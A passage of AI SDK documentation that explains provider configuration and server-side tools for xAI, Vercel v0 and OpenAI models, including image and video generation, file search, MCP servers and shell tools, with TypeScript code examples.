View X Video Tool

The view X video tool enables the model to view and analyze videos from X (Twitter) posts:

const { text } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'Summarize the content of this X video',
  tools: {
    view_x_video: xai.tools.viewXVideo(),
  },
});

MCP Server Tool

The MCP server tool enables the model to connect to remote Model Context Protocol (MCP) servers and use their tools:

const { text } = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'Use the weather tool to check conditions in San Francisco',
  tools: {
    weather_server: xai.tools.mcpServer({
      serverUrl: 'https://example.com/mcp',
      serverLabel: 'weather-service',
      serverDescription: 'Weather data provider',
      allowedTools: ['get_weather', 'get_forecast'],
    }),
  },
});

MCP Server Parameters

serverUrl string (required)

The URL of the remote MCP server.
serverLabel string

A label to identify the MCP server.
serverDescription string

A description of what the MCP server provides.
allowedTools string[]

List of tool names that the model is allowed to use from the MCP server. If not specified, all tools are allowed.
headers Record<string, string>

Custom headers to include when connecting to the MCP server.
authorization string

Authorization header value for authenticating with the MCP server (e.g., 'Bearer token123').

File Search Tool

The file search tool enables searching through documents stored in xAI vector stores (collections):

import { xai, type XaiLanguageModelResponsesOptions } from '@ai-sdk/xai';
import { streamText } from 'ai';

const result = streamText({
  model: xai.responses('grok-4.20-reasoning'),
  prompt: 'What documents do you have access to?',
  tools: {
    file_search: xai.tools.fileSearch({
      vectorStoreIds: ['collection_your-collection-id'],
      maxNumResults: 10,
    }),
  },
  providerOptions: {
    xai: {
      include: ['file_search_call.results'],
    } satisfies XaiLanguageModelResponsesOptions,
  },
});

File Search Parameters

vectorStoreIds string[] (required)

The IDs of the vector stores (collections) to search.
maxNumResults number

The maximum number of results to return from the search.

Provider Options for File Search

include Array<'file_search_call.results'>

Include file search results in the response. When set to ['file_search_call.results'], the response will contain the actual search results with file content and scores.

Multiple Tools

You can combine multiple server-side tools for comprehensive research:

import { xai } from '@ai-sdk/xai';
import { streamText } from 'ai';

const { fullStream } = streamText({
  model: xai.responses('grok-4.20-non-reasoning'),
  prompt: 'Research AI safety developments and calculate risk metrics',
  tools: {
    web_search: xai.tools.webSearch(),
    x_search: xai.tools.xSearch(),
    code_execution: xai.tools.codeExecution(),
    file_search: xai.tools.fileSearch({
      vectorStoreIds: ['collection_your-documents'],
    }),
    data_service: xai.tools.mcpServer({
      serverUrl: 'https://data.example.com/mcp',
      serverLabel: 'data-service',
    }),
  },
});

for await (const part of fullStream) {
  if (part.type === 'text-delta') {
    process.stdout.write(part.text);
  } else if (part.type === 'source' && part.sourceType === 'url') {
    console.log('\nSource:', part.url);
  }
}

Provider Options

The Responses API supports the following provider options:

import { xai, type XaiLanguageModelResponsesOptions } from '@ai-sdk/xai';
import { generateText } from 'ai';

const result = await generateText({
  model: xai.responses('grok-4.20-non-reasoning'),
  providerOptions: {
    xai: {
      reasoningEffort: 'high',
    } satisfies XaiLanguageModelResponsesOptions,
  },
  // ...
});

The following provider options are available:

reasoningEffort 'low' | 'medium' | 'high'

Control the reasoning effort for the model. Higher effort may produce more thorough results at the cost of increased latency and token usage.
logprobs boolean

Return log probabilities for output tokens.
topLogprobs number

Number of most likely tokens to return per token position (0-8). When set, logprobs is automatically enabled.
include Array<'file_search_call.results'>

Specify additional output data to include in the model response. Use ['file_search_call.results'] to include file search results with scores and content.
store boolean

Whether to store the input message(s) and model response for later retrieval. Defaults to true.
previousResponseId string

The ID of the previous response from the model. You can use it to continue a conversation.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Reasoning
`grok-4.20-reasoning`
`grok-4.20-non-reasoning`
`grok-4-1-fast-reasoning`
`grok-4-1-fast-non-reasoning`
`grok-4-1`
`grok-4-fast-reasoning`
`grok-4-fast-non-reasoning`
`grok-code-fast-1`
`grok-3`
`grok-3-mini`

Image Models

You can create xAI image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: xai.image('grok-imagine-image'),
  prompt: 'A futuristic cityscape at sunset',
});

Image Editing

xAI supports image editing through the grok-imagine-image model. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
import { readFileSync } from 'fs';

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: xai.image('grok-imagine-image'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
});

Multi-Image Editing

Combine or reference multiple input images in the prompt:

import { xai } from '@ai-sdk/xai';
import { generateImage } from 'ai';
import { readFileSync } from 'fs';

const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');

const { images } = await generateImage({
  model: xai.image('grok-imagine-image'),
  prompt: {
    text: 'Combine these two animals into a group photo',
    images: [cat, dog],
  },
});

Style Transfer

Apply artistic styles to an image:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: xai.image('grok-imagine-image'),
  prompt: {
    text: 'Transform this into a watercolor painting style',
    images: [imageBuffer],
  },
  aspectRatio: '1:1',
});

Image Provider Options

You can customize the image generation behavior with provider-specific settings via providerOptions.xai:

import { xai, type XaiImageModelOptions } from '@ai-sdk/xai';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: xai.image('grok-imagine-image-pro'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
  providerOptions: {
    xai: {
      resolution: '2k',
      quality: 'high',
    } satisfies XaiImageModelOptions,
  },
});

resolution '1k' | '2k'

Output resolution. 1k produces ~1024×1024 images, 2k produces ~2048×2048 images (actual dimensions vary based on aspect ratio). Available for grok-imagine-image-pro.
quality 'low' | 'medium' | 'high'

Image quality level. Higher quality may increase generation time.

Image Model Capabilities

Model	Resolution	Aspect Ratios	Image Editing
`grok-imagine-image-pro`	`1k`, `2k`	`1:1`, `16:9`, `9:16`, `4:3`, `3:4`, `3:2`, `2:3`, `2:1`, `1:2`, `19.5:9`, `9:19.5`, `20:9`, `9:20`, `auto`
`grok-imagine-image`	`1k`	`1:1`, `16:9`, `9:16`, `4:3`, `3:4`, `3:2`, `2:3`, `2:1`, `1:2`, `19.5:9`, `9:19.5`, `20:9`, `9:20`, `auto`

Video Models

You can create xAI video models using the .video() factory method. For more on video generation with the AI SDK see generateVideo().

This provider supports standard video generation from text prompts or image input, plus explicit video editing, video extension, and reference-to-video (R2V) operations.

Text-to-Video

Generate videos from text prompts:

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'A chicken flying into the sunset in the style of 90s anime.',
  aspectRatio: '16:9',
  duration: 5,
  providerOptions: {
    xai: {
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies XaiVideoModelOptions,
  },
});

Generation with Image Input

Generate videos using an image as the starting frame with an optional text prompt. This uses the standard generation path rather than a separate provider mode:

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: {
    image: 'https://example.com/start-frame.png',
    text: 'The cat slowly turns its head and blinks',
  },
  duration: 5,
  providerOptions: {
    xai: {
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies XaiVideoModelOptions,
  },
});

Video Editing

Edit an existing video using a text prompt by providing a source video URL via provider options:

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'Give the person sunglasses and a hat',
  providerOptions: {
    xai: {
      mode: 'edit-video',
      videoUrl: 'https://example.com/source-video.mp4',
      pollTimeoutMs: 600000, // 10 minutes
    } satisfies XaiVideoModelOptions,
  },
});

Chaining and Concurrent Edits

The xAI-hosted video URL is available in providerMetadata.xai.videoUrl. You can use it to chain sequential edits or branch into concurrent edits using Promise.all:

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const providerOptions = {
  xai: {
    mode: 'edit-video',
    videoUrl: 'https://example.com/source-video.mp4',
    pollTimeoutMs: 600000,
  } satisfies XaiVideoModelOptions,
};

// Step 1: Apply an initial edit
const step1 = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'Add a party hat to the person',
  providerOptions,
});

// Get the xAI-hosted URL from provider metadata
const step1VideoUrl = step1.providerMetadata?.xai?.videoUrl as string;

// Step 2: Apply two more edits concurrently, building on step 1
const [withSunglasses, withScarf] = await Promise.all([
  generateVideo({
    model: xai.video('grok-imagine-video'),
    prompt: 'Add sunglasses',
    providerOptions: {
      xai: { mode: 'edit-video', videoUrl: step1VideoUrl, pollTimeoutMs: 600000 },
    },
  }),
  generateVideo({
    model: xai.video('grok-imagine-video'),
    prompt: 'Add a scarf',
    providerOptions: {
      xai: { mode: 'edit-video', videoUrl: step1VideoUrl, pollTimeoutMs: 600000 },
    },
  }),
]);

Video Extension

Extend an existing video from its last frame. The duration controls the length of the extension only, not the total output. The output inherits aspectRatio and resolution from the source video.

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

// Step 1: Generate a source video
const source = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'A cat sitting on a sunlit windowsill, tail gently swishing.',
  duration: 5,
  aspectRatio: '16:9',
  providerOptions: {
    xai: {
      pollTimeoutMs: 600000,
    } satisfies XaiVideoModelOptions,
  },
});

const sourceUrl = source.providerMetadata?.xai?.videoUrl as string;

// Step 2: Extend the video with a new scene
const extended = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt: 'The cat turns its head, notices a butterfly, and leaps off.',
  duration: 6,
  providerOptions: {
    xai: {
      mode: 'extend-video',
      videoUrl: sourceUrl,
      pollTimeoutMs: 600000,
    } satisfies XaiVideoModelOptions,
  },
});

Reference-to-Video (R2V)

import { xai, type XaiVideoModelOptions } from '@ai-sdk/xai';
import { experimental_generateVideo as generateVideo } from 'ai';

const { video } = await generateVideo({
  model: xai.video('grok-imagine-video'),
  prompt:
    'The comic cat from <IMAGE_1> and the comic dog from <IMAGE_2> ' +
    'are having a playful chase through a sunlit park. ' +
    'Cinematic slow-motion, warm afternoon light.',
  duration: 8,
  aspectRatio: '16:9',
  providerOptions: {
    xai: {
      mode: 'reference-to-video',
      referenceImageUrls: [
        'https://example.com/comic-cat.png',
        'https://example.com/comic-dog.png',
      ],
      pollTimeoutMs: 600000,
    } satisfies XaiVideoModelOptions,
  },
});

Use <IMAGE_1>, <IMAGE_2>, etc. in your prompt to reference specific images. Up to 7 reference images are supported per request.

Video Provider Options

The following provider options are available via providerOptions.xai. You can validate the provider options using the XaiVideoModelOptions type.

pollIntervalMs number

Polling interval in milliseconds for checking task status. Defaults to 5000.
pollTimeoutMs number

Maximum wait time in milliseconds for video generation. Defaults to 600000 (10 minutes).
resolution '480p' | '720p'

Video resolution. When using the SDK's standard resolution parameter, 1280x720 maps to 720p and 854x480 maps to 480p. Use this provider option to pass the native format directly.
mode 'edit-video' | 'extend-video' | 'reference-to-video'

Selects the explicit video operation. Each mode is mutually exclusive:
- 'edit-video' — edit an existing video (requires videoUrl)
- 'extend-video' — extend a video from its last frame (requires videoUrl)
- 'reference-to-video' — generate from reference images (requires referenceImageUrls)
When omitted, standard generation is used. Legacy inputs are still auto-detected from fields for backward compatibility.
videoUrl string

URL of a source video. Used with mode: 'edit-video' for video editing and mode: 'extend-video' for video extension.
referenceImageUrls string[]

Array of reference image URLs (1–7 images) or base64 data URIs for reference-to-video (R2V) generation. The model incorporates visual elements from these images without using them as the first frame. Use <IMAGE_1>, <IMAGE_2>, etc. in the prompt to reference specific images. Used with mode: 'reference-to-video'.

Aspect Ratio and Resolution

For text-to-video, you can specify both aspectRatio and resolution. The default aspect ratio is 16:9 and the default resolution is 480p.

For image-to-video, the output defaults to the input image's aspect ratio. If you specify aspectRatio, it will override this and stretch the image to the desired ratio.

For video extension, the output inherits aspectRatio and resolution from the source video. duration is supported and controls only the extension length.

For reference-to-video (R2V), you can specify duration, aspectRatio, and resolution just like text-to-video.

Video Model Capabilities

Model	Duration	Aspect Ratios	Resolution	Image-to-Video	Editing	Extension	R2V
`grok-imagine-video`	1–15s	`1:1`, `16:9`, `9:16`, `4:3`, `3:4`, `3:2`, `2:3`	`480p`, `720p`

title: Vercel description: Learn how to use Vercel's v0 models with the AI SDK.

Vercel Provider

The Vercel provider gives you access to the v0 API, designed for building modern web applications. The v0 models support text and image inputs and provide fast streaming responses.

You can create your Vercel API key at v0.dev.

Features

Framework aware completions: Evaluated on modern stacks like Next.js and Vercel
Auto-fix: Identifies and corrects common coding issues during generation
Quick edit: Streams inline edits as they're available
Multimodal: Supports both text and image inputs

Setup

The Vercel provider is available via the @ai-sdk/vercel module. You can install it with:

Provider Instance

You can import the default provider instance vercel from @ai-sdk/vercel:

import { vercel } from '@ai-sdk/vercel';

If you need a customized setup, you can import createVercel from @ai-sdk/vercel and create a provider instance with your settings:

import { createVercel } from '@ai-sdk/vercel';

const vercel = createVercel({
  apiKey: process.env.VERCEL_API_KEY ?? '',
});

You can use the following optional settings to customize the Vercel provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://api.v0.dev/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the VERCEL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create language models using a provider instance. The first argument is the model ID, for example:

import { vercel } from '@ai-sdk/vercel';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vercel('v0-1.5-md'),
  prompt: 'Create a Next.js AI chatbot',
});

Vercel language models can also be used in the streamText function (see AI SDK Core).

Models

v0-1.5-md

The v0-1.5-md model is for everyday tasks and UI generation.

v0-1.5-lg

The v0-1.5-lg model is for advanced thinking or reasoning.

v0-1.0-md (legacy)

The v0-1.0-md model is the legacy model served by the v0 API.

All v0 models have the following capabilities:

Supports text and image inputs (multimodal)
Supports function/tool calls
Streaming responses with low latency
Optimized for frontend and full-stack web development

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`v0-1.5-md`
`v0-1.5-lg`
`v0-1.0-md`

title: OpenAI description: Learn how to use the OpenAI provider for the AI SDK.

OpenAI Provider

The OpenAI provider contains language model support for the OpenAI responses, chat, and completion APIs, as well as embedding model support for the OpenAI embeddings API.

Setup

The OpenAI provider is available in the @ai-sdk/openai module. You can install it with

Provider Instance

You can import the default provider instance openai from @ai-sdk/openai:

import { openai } from '@ai-sdk/openai';

If you need a customized setup, you can import createOpenAI from @ai-sdk/openai and create a provider instance with your settings:

import { createOpenAI } from '@ai-sdk/openai';

const openai = createOpenAI({
  // custom settings, e.g.
  headers: {
    'header-name': 'header-value',
  },
});

You can use the following optional settings to customize the OpenAI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.openai.com/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the OPENAI_API_KEY environment variable.
name string

The provider name. You can set this when using OpenAI compatible providers to change the model provider property. Defaults to openai.
organization string

OpenAI Organization.
project string

OpenAI project.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

The OpenAI provider instance is a function that you can invoke to create a language model:

const model = openai('gpt-5');

It automatically selects the correct API based on the model id. You can also pass additional settings in the second argument:

const model = openai('gpt-5', {
  // additional settings
});

Example

You can use OpenAI language models to generate text with the generateText function:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: openai('gpt-5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

OpenAI language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Responses Models

You can use the OpenAI responses API with the openai(modelId) or openai.responses(modelId) factory methods. It is the default API that is used by the OpenAI provider (since AI SDK 5).

const model = openai('gpt-5');

Further configuration can be done using OpenAI provider options. You can validate the provider options using the OpenAILanguageModelResponsesOptions type.

import { openai, OpenAILanguageModelResponsesOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'), // or openai.responses('gpt-5')
  providerOptions: {
    openai: {
      parallelToolCalls: false,
      store: false,
      user: 'user_123',
      // ...
    } satisfies OpenAILanguageModelResponsesOptions,
  },
  // ...
});

The following provider options are available:

parallelToolCalls boolean Whether to use parallel tool calls. Defaults to true.
store boolean

Whether to store the generation. Defaults to true.
maxToolCalls integer The maximum number of total calls to built-in tools that can be processed in a response. This maximum number applies across all built-in tool calls, not per individual tool. Any further attempts to call a tool by the model will be ignored.
metadata Record<string, string> Additional metadata to store with the generation.
conversation string The ID of the OpenAI Conversation to continue. You must create a conversation first via the OpenAI API. Cannot be used in conjunction with previousResponseId. Defaults to undefined.
previousResponseId string The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
instructions string Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
logprobs boolean | number Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true returns the log probabilities of the tokens that were generated. Setting to a number (1-20) returns the log probabilities of the top n tokens that were generated.
user string A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
reasoningEffort 'none' | 'minimal' | 'low' | 'medium' | 'high' | 'xhigh' Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.

reasoningSummary 'auto' | 'detailed' Controls whether the model returns its reasoning process. Set to 'auto' for a condensed summary, 'detailed' for more comprehensive reasoning. Defaults to undefined (no reasoning summaries). When enabled, reasoning summaries appear in the stream as events with type 'reasoning' and in non-streaming responses within the reasoning field.
strictJsonSchema boolean Whether to use strict JSON schema validation. Defaults to true.

serviceTier 'auto' | 'flex' | 'priority' | 'default' Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported).

Defaults to 'auto'.
textVerbosity 'low' | 'medium' | 'high' Controls the verbosity of the model's response. Lower values result in more concise responses, while higher values result in more verbose responses. Defaults to 'medium'.
include Array<string> Specifies additional content to include in the response. Supported values: ['file_search_call.results'] for including file search results in responses. ['message.output_text.logprobs'] for logprobs. Defaults to undefined.
truncation string The truncation strategy to use for the model response.
- Auto: If the input to this Response exceeds the model's context window size, the model will truncate the response to fit the context window by dropping items from the beginning of the conversation.
- disabled (default): If the input size will exceed the context window size for a model, the request will fail with a 400 error.
promptCacheKey string A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
promptCacheRetention 'in_memory' | '24h' The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.
safetyIdentifier string A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.
systemMessageMode 'system' | 'developer' | 'remove' Controls the role of the system message when making requests. By default (when omitted), for models that support reasoning the system message is automatically converted to a developer message. Setting systemMessageMode to system passes the system message as a system-level instruction; developer passes it as a developer message; remove omits the system message from the request.
forceReasoning boolean Force treating this model as a reasoning model. This is useful for "stealth" reasoning models (e.g. via a custom baseURL) where the model ID is not recognized by the SDK's allowlist. When enabled, the SDK applies reasoning-model parameter compatibility rules and defaults systemMessageMode to developer unless overridden.
contextManagement Array<object> Enable server-side context management (compaction). When configured, the server automatically compresses conversation context when token usage crosses a specified threshold. Each object in the array should have:
- type: 'compaction'
- compactThreshold: number — the token count at which compaction is triggered

The OpenAI responses provider also returns provider-specific metadata:

For Responses models, you can type this metadata using OpenaiResponsesProviderMetadata:

import { openai, type OpenaiResponsesProviderMetadata } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
});

const providerMetadata = result.providerMetadata as
  | OpenaiResponsesProviderMetadata
  | undefined;

const { responseId, logprobs, serviceTier } = providerMetadata?.openai ?? {};

// responseId can be used to continue a conversation (previousResponseId).
console.log(responseId);

The following OpenAI-specific metadata may be returned:

responseId string | null | undefined The ID of the response. Can be used to continue a conversation.
logprobs (optional) Log probabilities of output tokens (when enabled).
serviceTier (optional) Service tier information returned by the API.

Reasoning Output

import {
  openai,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai('gpt-5'),
  prompt: 'Tell me about the Mission burrito debate in San Francisco.',
  providerOptions: {
    openai: {
      reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    console.log(`Reasoning: ${part.textDelta}`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

For non-streaming calls with generateText, the reasoning summaries are available in the reasoning field of the response:

import {
  openai,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Tell me about the Mission burrito debate in San Francisco.',
  providerOptions: {
    openai: {
      reasoningSummary: 'auto',
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});
console.log('Reasoning:', result.reasoning);

Learn more about reasoning summaries in the OpenAI documentation.

WebSocket Transport

The ai-sdk-openai-websocket-fetch package provides a drop-in fetch replacement that routes streaming requests through a persistent WebSocket connection.

Pass the WebSocket fetch to createOpenAI via the fetch option:

import { createOpenAI } from '@ai-sdk/openai';
import { createWebSocketFetch } from 'ai-sdk-openai-websocket-fetch';
import { streamText } from 'ai';

// Create a WebSocket-backed fetch instance
const wsFetch = createWebSocketFetch();
const openai = createOpenAI({ fetch: wsFetch });

const result = streamText({
  model: openai('gpt-4.1-mini'),
  prompt: 'Hello!',
  tools: {
    // ...
  },
  onFinish: () => wsFetch.close(), // close the WebSocket when done
});

You can see a live side-by-side comparison of HTTP vs WebSocket streaming performance in the demo app.

Verbosity Control

You can control the length and detail of model responses using the textVerbosity parameter:

import {
  openai,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5-mini'),
  prompt: 'Write a poem about a boy and his first pet dog.',
  providerOptions: {
    openai: {
      textVerbosity: 'low', // 'low' for concise, 'medium' (default), or 'high' for verbose
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

The textVerbosity parameter scales output length without changing the underlying prompt:

'low': Produces terse, minimal responses
'medium': Balanced detail (default)
'high': Verbose responses with comprehensive detail

Web Search Tool

The OpenAI responses API supports web search through the openai.tools.webSearch tool.

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'What happened in San Francisco last week?',
  tools: {
    web_search: openai.tools.webSearch({
      // optional configuration:
      externalWebAccess: true,
      searchContextSize: 'high',
      userLocation: {
        type: 'approximate',
        city: 'San Francisco',
        region: 'California',
      },
      filters: {
        allowedDomains: ['sfchronicle.com', 'sfgate.com'],
      },
    }),
  },
  // Force web search tool (optional):
  toolChoice: { type: 'tool', toolName: 'web_search' },
});

// URL sources directly from `results`
const sources = result.sources;

// Or access sources from tool results
for (const toolResult of result.toolResults) {
  if (toolResult.toolName === 'web_search') {
    console.log('Query:', toolResult.output.action.query);
    console.log('Sources:', toolResult.output.sources);
    // `sources` is an array of object: { type: 'url', url: string }
  }
}

The web search tool supports the following configuration options:

externalWebAccess boolean - Whether to use external web access for fetching live content. Defaults to true.
searchContextSize 'low' | 'medium' | 'high' - Controls the amount of context used for the search. Higher values provide more comprehensive results but may have higher latency and cost.
userLocation - Optional location information to provide geographically relevant results. Includes type (always 'approximate'), country, city, region, and timezone.
filters - Optional filter configuration to restrict search results.
- allowedDomains string[] - Array of allowed domains for the search. Subdomains of the provided domains are automatically included.

For detailed information on configuration options see the OpenAI Web Search Tool documentation.

File Search Tool

The OpenAI responses API supports file search through the openai.tools.fileSearch tool.

You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'What does the document say about user authentication?',
  tools: {
    file_search: openai.tools.fileSearch({
      vectorStoreIds: ['vs_123'],
      // configuration below is optional:
      maxNumResults: 5,
      filters: {
        key: 'author',
        type: 'eq',
        value: 'Jane Smith',
      },
      ranking: {
        ranker: 'auto',
        scoreThreshold: 0.5,
      },
    }),
  },
  providerOptions: {
    openai: {
      // optional: include results
      include: ['file_search_call.results'],
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

The file search tool supports filtering with both comparison and compound filters:

Comparison filters - Filter by a single attribute:

eq - Equal to
ne - Not equal to
gt - Greater than
gte - Greater than or equal to
lt - Less than
lte - Less than or equal to
in - Value is in array
nin - Value is not in array

// Single comparison filter
filters: { key: 'year', type: 'gte', value: 2023 }

// Filter with array values
filters: { key: 'status', type: 'in', value: ['published', 'reviewed'] }

Compound filters - Combine multiple filters with and or or:

// Compound filter with AND
filters: {
  type: 'and',
  filters: [
    { key: 'author', type: 'eq', value: 'Jane Smith' },
    { key: 'year', type: 'gte', value: 2023 },
  ],
}

// Compound filter with OR
filters: {
  type: 'or',
  filters: [
    { key: 'department', type: 'eq', value: 'Engineering' },
    { key: 'department', type: 'eq', value: 'Research' },
  ],
}

Image Generation Tool

OpenAI's Responses API supports multi-modal image generation as a provider-defined tool. Availability is restricted to specific models (for example, gpt-5 variants).

You can use the image tool with either generateText or streamText:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt:
    'Generate an image of an echidna swimming across the Mozambique channel.',
  tools: {
    image_generation: openai.tools.imageGeneration({ outputFormat: 'webp' }),
  },
});

for (const toolResult of result.staticToolResults) {
  if (toolResult.toolName === 'image_generation') {
    const base64Image = toolResult.output.result;
  }
}

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai('gpt-5'),
  prompt:
    'Generate an image of an echidna swimming across the Mozambique channel.',
  tools: {
    image_generation: openai.tools.imageGeneration({
      outputFormat: 'webp',
      quality: 'low',
    }),
  },
});

for await (const part of result.fullStream) {
  if (part.type == 'tool-result' && !part.dynamic) {
    const base64Image = part.output.result;
  }
}

For complete details on model availability, image quality controls, supported sizes, and tool-specific parameters, refer to the OpenAI documentation:

Image generation overview and models: OpenAI Image Generation
Image generation tool parameters (background, size, quality, format, etc.): Image Generation Tool Options

Code Interpreter Tool

The OpenAI responses API supports the code interpreter tool through the openai.tools.codeInterpreter tool. This allows models to write and execute Python code.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Write and run Python code to calculate the factorial of 10',
  tools: {
    code_interpreter: openai.tools.codeInterpreter({
      // optional configuration:
      container: {
        fileIds: ['file-123', 'file-456'], // optional file IDs to make available
      },
    }),
  },
});

The code interpreter tool can be configured with:

container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter

MCP Tool

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'Search the web for the latest news about AI developments',
  tools: {
    mcp: openai.tools.mcp({
      serverLabel: 'web-search',
      serverUrl: 'https://mcp.exa.ai/mcp',
      serverDescription: 'A web-search API for AI agents',
    }),
  },
});

The MCP tool can be configured with:

serverLabel string (required)

A label to identify the MCP server. This label is used in tool calls to distinguish between multiple MCP servers.
serverUrl string (required if connectorId is not provided)

The URL for the MCP server. Either serverUrl or connectorId must be provided.
connectorId string (required if serverUrl is not provided)

Identifier for a service connector. Either serverUrl or connectorId must be provided.
serverDescription string (optional)

Optional description of the MCP server that helps the model understand its purpose.
allowedTools string[] | object (optional)

Controls which tools from the MCP server are available. Can be:
- An array of tool names: ['tool1', 'tool2']
- An object with filters:
```
{
  readOnly: true, // Only allow read-only tools
  toolNames: ['tool1', 'tool2'] // Specific tool names
}
```
authorization string (optional)

OAuth access token for authenticating with the MCP server or connector.
headers Record<string, string> (optional)

Optional HTTP headers to include in requests to the MCP server.
requireApproval 'always' | 'never' | object (optional)

Controls which MCP tool calls require user approval before execution. Can be:
- 'always': All MCP tool calls require approval
- 'never': No MCP tool calls require approval (default)
- An object with filters:
```
{
  never: {
    toolNames: ['safe_tool', 'another_safe_tool']; // Skip approval for these tools
  }
}
```
When approval is required, the model will return a tool-approval-request content part that you can use to prompt the user for approval. See Human in the Loop for more details on implementing approval workflows.

Local Shell Tool

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-5-codex'),
  tools: {
    local_shell: openai.tools.localShell({
      execute: async ({ action }) => {
        // ... your implementation, e.g. sandbox access ...
        return { output: stdout };
      },
    }),
  },
  prompt: 'List the files in my home directory.',
  stopWhen: isStepCount(2),
});

Shell Tool

The shell tool supports three environment modes that control where commands are executed:

Local Execution (default)

When no environment is specified (or type: 'local' is used), commands are executed locally via your execute callback:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
